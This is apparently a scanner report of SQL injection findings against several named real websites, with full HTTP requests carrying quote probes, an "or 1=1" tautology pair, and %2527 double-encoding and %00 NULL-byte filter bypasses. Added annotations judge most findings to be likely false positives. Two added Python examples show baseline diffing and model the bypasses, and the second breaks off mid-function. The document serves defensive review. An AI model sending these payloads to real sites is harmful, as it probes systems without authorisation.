SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Check this one carefully before crediting it: the response excerpt below is an HTTP 200 page whose body mentions MySQL and PostgreSQL in ordinary prose (the Bad Behavior requirements text), and the same excerpt comes back unchanged for every quote payload in this group of REST URL findings. A DBMS fingerprint that matches page content the site always serves is not evidence that the payload reached a query; diff the payload response against an unmodified request before treating "PostgreSQL" as an error signature.
Request
GET /2011'/01/05/bad-behavior-2-1-8/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/11"> <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Request
GET /2011/01'/05/bad-behavior-2-1-8/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/11"> <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Request
GET /2011/01/05'/bad-behavior-2-1-8/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/11"> <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Request
GET /blog'/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:12:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761978+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 72723
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/11"> <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Request
GET /category/bad-behavior'/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762060+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 51665
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/11"> <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]...
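The REST URL findings above all rest on an error-message fingerprint, so here is an added example (not part of the scan report, and not the scanner's own logic) of how an error-based check should credit a DBMS only when the payload introduces the signature. The response bodies are constructed: BASELINE_BODY imitates the prose excerpted above, and REAL_ERROR_BODY is a hypothetical PHP pg_query() warning. The signature table is illustrative, not a real scanner's list.

```python
import re

# Constructed response bodies. BASELINE_BODY stands in for the unmodified
# page: like the excerpts above it mentions MySQL and PostgreSQL in ordinary
# prose. PAYLOAD_BODY is what the site returned for the quote payload (the
# same page). REAL_ERROR_BODY is a hypothetical PHP warning from a broken
# query, the kind of text an error-based check should actually key on.
BASELINE_BODY = (
    "<p>Both releases require MySQL 4.0 or later when using a database. "
    "I have had code contributed which offers PostgreSQL support and I will "
    "be integrating this soon.</p>"
)
PAYLOAD_BODY = BASELINE_BODY
REAL_ERROR_BODY = (
    "<b>Warning</b>: pg_query(): Query failed: ERROR: syntax error at or "
    "near \"'\" LINE 1: SELECT * FROM posts WHERE year = '2011''"
)

# Illustrative fingerprint list; a real scanner carries far more patterns.
DB_ERROR_SIGNATURES = {
    "PostgreSQL": [r"PostgreSQL", r"pg_query\(\)", r"syntax error at or near"],
    "MySQL": [r"You have an error in your SQL syntax", r"mysql_fetch_"],
}


def matched_signatures(body):
    """Return the set of (dbms, pattern) pairs whose pattern occurs in body."""
    return {
        (dbms, pattern)
        for dbms, patterns in DB_ERROR_SIGNATURES.items()
        for pattern in patterns
        if re.search(pattern, body)
    }


def naive_finding(payload_body):
    """What a baseline-less check reports: any match at all names a DBMS.

    This is the behaviour that turns the site's own 'PostgreSQL support'
    sentence into a PostgreSQL error finding."""
    return {dbms for dbms, _ in matched_signatures(payload_body)}


def error_based_finding(baseline_body, payload_body):
    """Name the DBMS only for signatures that the payload introduced.

    A signature already present in the baseline response is page content,
    not evidence that the payload reached a query, so it is subtracted out.
    Returns the set of DBMS names supported by newly appearing signatures
    (empty when the payload changed nothing that looks like an error).
    """
    introduced = matched_signatures(payload_body) - matched_signatures(baseline_body)
    return {dbms for dbms, _ in introduced}
```

Run against the constructed bodies, naive_finding names PostgreSQL for the unmodified page, while error_based_finding returns nothing for it and names PostgreSQL only when the pg_query() warning appears. The same subtraction applies to any "general error message" heuristic: fetch the baseline first.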
1.6. http://bad-behavior.ioerror.us/category/bad-behavior/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://bad-behavior.ioerror.us
Path: /category/bad-behavior/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
As with the REST URL findings, the excerpted response is a 200 OK page whose body contains the word PostgreSQL in its own prose; confirm that the fingerprint did not simply match that text before accepting either the finding or the "blocked, then bypassed" interpretation.
Request
GET /category/bad-behavior/?1%2527=1 HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762019+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 51670
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/11"> <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]...
1.7. http://bad-behavior.ioerror.us/feed/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://bad-behavior.ioerror.us
Path: /feed/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request
GET /feed/?1%2527=1 HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:36 GMT
Content-Type: text/xml; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761895+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Last-Modified: Tue, 15 Feb 2011 06:24:42 GMT
ETag: "d0aa19c0e184cf0e188a04458920669c"
Content-Length: 41692
<?xml version="1.0" encoding="UTF-8"?> <rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elem ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]...
1.8. http://bad-behavior.ioerror.us/feed/atom/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://bad-behavior.ioerror.us
Path: /feed/atom/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request
GET /feed/atom/?1%2527=1 HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:42 GMT
Content-Type: application/atom+xml; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761902+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Last-Modified: Tue, 15 Feb 2011 06:24:42 GMT
ETag: "d0aa19c0e184cf0e188a04458920669c"
Content-Length: 45367
<?xml version="1.0" encoding="UTF-8"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:thr="http://purl.org/syndication/thread/1.0" xml:lang="en" xml:base="http://bad-behavior.ioerror.us/wp-ato ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 20435182'%20or%201%3d1--%20 and 20435182'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Looking at the two responses below, the visible differences are the Date header, the key= value embedded in the Mint record URL, and the Content-Length that follows from it (2003 against 2015 bytes). A token that differs from one request to the next is enough on its own to make any two responses differ, so send the unmodified request twice and confirm the bodies are identical (or mask the key before comparing) before treating this difference as evidence of a query.
Response 1
HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Feb 2011 16:52:18 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MintAcceptsCookies=1; path=/; domain=.client.trafficshaping.com
Content-Length: 2003
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript
var Mint = new Object();
Mint.save = function() {
    var now = new Date();
    var debug = false; // this is set by php
    if (window.location.hash == '#Mint:Debug') { debug = true; };
    var path = 'http://www.trafficshaping.com/_mint/?record&key=384148426b333545573532697a435238386b393231';
    path = path.replace(/^https?:/, window.location.protocol);

    // Loop through the different plug-ins to assemble the query string
    for (var developer in this) {
        for (var plugin in this[developer]) {
            if (this[developer][plugin] && this[developer][plugin].onsave) {
                path += this[developer][plugin].onsave();
            };
        };
    };
    // Slap the current time on there to prevent caching on subsequent page views in a few browsers
    path += '&'+now.getTime();

    // Redirect to the debug page
    if (debug) {
        window.open(path+'&debug&errors', 'MintLiveDebug'+now.getTime());
        return;
    };
Response 2
HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:19 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Feb 2011 16:52:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MintAcceptsCookies=1; path=/; domain=.client.trafficshaping.com
Content-Length: 2015
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript
var Mint = new Object();
Mint.save = function() {
    var now = new Date();
    var debug = false; // this is set by php
    if (window.location.hash == '#Mint:Debug') { debug = true; };
    var path = 'http://www.trafficshaping.com/_mint/?record&key=4455513933353556785a75734b5367744a32383868616979393231';
    path = path.replace(/^https?:/, window.location.protocol);

    // Loop through the different plug-ins to assemble the query string
    for (var developer in this) {
        for (var plugin in this[developer]) {
            if (this[developer][plugin] && this[developer][plugin].onsave) {
                path += this[developer][plugin].onsave();
            };
        };
    };
    // Slap the current time on there to prevent caching on subsequent page views in a few browsers
    path += '&'+now.getTime();

    // Redirect to the debug page
    if (debug) {
        window.open(path+'&debug&errors', 'MintLiveDebug'+now.getTime());
        return;
    };
The ga_vid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ga_vid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Treat this with caution. Both excerpted responses are HTTP 200 ad impressions from googleads.g.doubleclick.net, the "general error message" the check keyed on is not visible in the excerpt, and the ad copy this endpoint returns changes from request to request (compare the snippet here with the one in the u_w finding that follows). The length difference (10985 against 11041 bytes) is therefore at least as consistent with ad rotation as with a query error; repeat the unmodified request several times and diff the full bodies before crediting the finding.
Request 1
GET /pagead/ads?client=ca-pub-2720111371110786&output=html&h=60&slotname=9367320272&w=234&lmt=1298774527&flash=10.2.154&url=http%3A%2F%2Fwww.thedetroitbureau.com%2Fabout-us%2F&dt=1298752927948&shv=r20101117&jsv=r20110208&saldr=1&prev_slotnames=9745053000%2C1777365721&correlator=1298752927865&frm=0&adk=2212307865&ga_vid=1929730161.1298752860%2527&ga_sid=1298752860&ga_hid=1804039218&ga_fc=1&u_tz=-360&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1421&bih=954&ref=http%3A%2F%2Fwww.thedetroitbureau.com%2F2011%2F02%2Finsurer-wants-fbi-to-pay-750000-for-crashed-ferrari%2F&fu=0&ifi=3&dtd=2&xpc=G3hbhrtKB2&p=http%3A//www.thedetroitbureau.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedetroitbureau.com/about-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response 1
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Feb 2011 20:53:54 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 10985
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#ffffff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]... <div class=adb>See How the GMC Terrain Stacks Up Against the Tucson. Compare Now!</div> ...[SNIP]...
Request 2
GET /pagead/ads?client=ca-pub-2720111371110786&output=html&h=60&slotname=9367320272&w=234&lmt=1298774527&flash=10.2.154&url=http%3A%2F%2Fwww.thedetroitbureau.com%2Fabout-us%2F&dt=1298752927948&shv=r20101117&jsv=r20110208&saldr=1&prev_slotnames=9745053000%2C1777365721&correlator=1298752927865&frm=0&adk=2212307865&ga_vid=1929730161.1298752860%2527%2527&ga_sid=1298752860&ga_hid=1804039218&ga_fc=1&u_tz=-360&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1421&bih=954&ref=http%3A%2F%2Fwww.thedetroitbureau.com%2F2011%2F02%2Finsurer-wants-fbi-to-pay-750000-for-crashed-ferrari%2F&fu=0&ifi=3&dtd=2&xpc=G3hbhrtKB2&p=http%3A//www.thedetroitbureau.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedetroitbureau.com/about-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response 2
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Feb 2011 20:53:55 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 11041
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#ffffff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]...
The u_w parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_w parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
The same caution as for ga_vid applies here: both responses are 200 OK ad impressions (10976 against 14565 bytes), and the ad copy in Response 1 is not the one served for the ga_vid test, so this endpoint does not give a stable baseline to diff against. Note also that u_w is the reported screen width; establish what, if anything, the server does with it before assuming it reaches a query.
Request 1
GET /pagead/ads?client=ca-pub-2720111371110786&output=html&h=60&slotname=9367320272&w=234&lmt=1298774527&flash=10.2.154&url=http%3A%2F%2Fwww.thedetroitbureau.com%2Fabout-us%2F&dt=1298752927948&shv=r20101117&jsv=r20110208&saldr=1&prev_slotnames=9745053000%2C1777365721&correlator=1298752927865&frm=0&adk=2212307865&ga_vid=1929730161.1298752860&ga_sid=1298752860&ga_hid=1804039218&ga_fc=1&u_tz=-360&u_his=7&u_java=1&u_h=1200&u_w=1920%00'&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1421&bih=954&ref=http%3A%2F%2Fwww.thedetroitbureau.com%2F2011%2F02%2Finsurer-wants-fbi-to-pay-750000-for-crashed-ferrari%2F&fu=0&ifi=3&dtd=2&xpc=G3hbhrtKB2&p=http%3A//www.thedetroitbureau.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedetroitbureau.com/about-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response 1
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Feb 2011 20:59:52 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 10976
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#ffffff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]... <div class=adb>Exceptional Engine Protection For Your Classic Vehicle.</div> ...[SNIP]...
Request 2
GET /pagead/ads?client=ca-pub-2720111371110786&output=html&h=60&slotname=9367320272&w=234&lmt=1298774527&flash=10.2.154&url=http%3A%2F%2Fwww.thedetroitbureau.com%2Fabout-us%2F&dt=1298752927948&shv=r20101117&jsv=r20110208&saldr=1&prev_slotnames=9745053000%2C1777365721&correlator=1298752927865&frm=0&adk=2212307865&ga_vid=1929730161.1298752860&ga_sid=1298752860&ga_hid=1804039218&ga_fc=1&u_tz=-360&u_his=7&u_java=1&u_h=1200&u_w=1920%00''&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1421&bih=954&ref=http%3A%2F%2Fwww.thedetroitbureau.com%2F2011%2F02%2Finsurer-wants-fbi-to-pay-750000-for-crashed-ferrari%2F&fu=0&ifi=3&dtd=2&xpc=G3hbhrtKB2&p=http%3A//www.thedetroitbureau.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedetroitbureau.com/about-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response 2
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Feb 2011 20:59:53 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 14565
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#ffffff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]...
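Several findings above describe a blocking layer that is beaten by double URL-encoding (%2527 for ') or by a NULL byte ahead of the blocked character (%00'). The following is an added example in Python, not code from the report or from any of the scanned sites, that models both bypasses as a mismatch between what the filter inspects and what the sink receives, then shows a filter that canonicalises first and, separately, the sink with and without bound parameters. The pipeline, the posts table and its single row are constructed stand-ins; the names (server_decode, blocking_layer_view, slugs_unsafe and so on) are invented for the example.

```python
import sqlite3
from urllib.parse import unquote

# --- the filter/decoder mismatch behind the %2527 and %00 bypasses ---------

def server_decode(raw):
    """One round of percent-decoding, as the web server applies before the
    application or its blocking layer sees the parameter."""
    return unquote(raw)


def blocking_layer_view(value):
    """What a C-string style filter inspects: it stops at the first NUL
    because its string routines treat NUL as the terminator."""
    return value.split("\x00", 1)[0]


def naive_block(value):
    """Blocking layer: reject if the part it inspects contains a quote."""
    return "'" in blocking_layer_view(value)


def application_decode(value):
    """The application decodes the parameter a second time (urldecode()
    applied to an already decoded value) and keeps the whole string."""
    return unquote(value)


def value_reaching_sink(raw):
    """Pipeline: server decode -> naive filter -> application decode.
    Returns the string that reaches the query, or None if blocked."""
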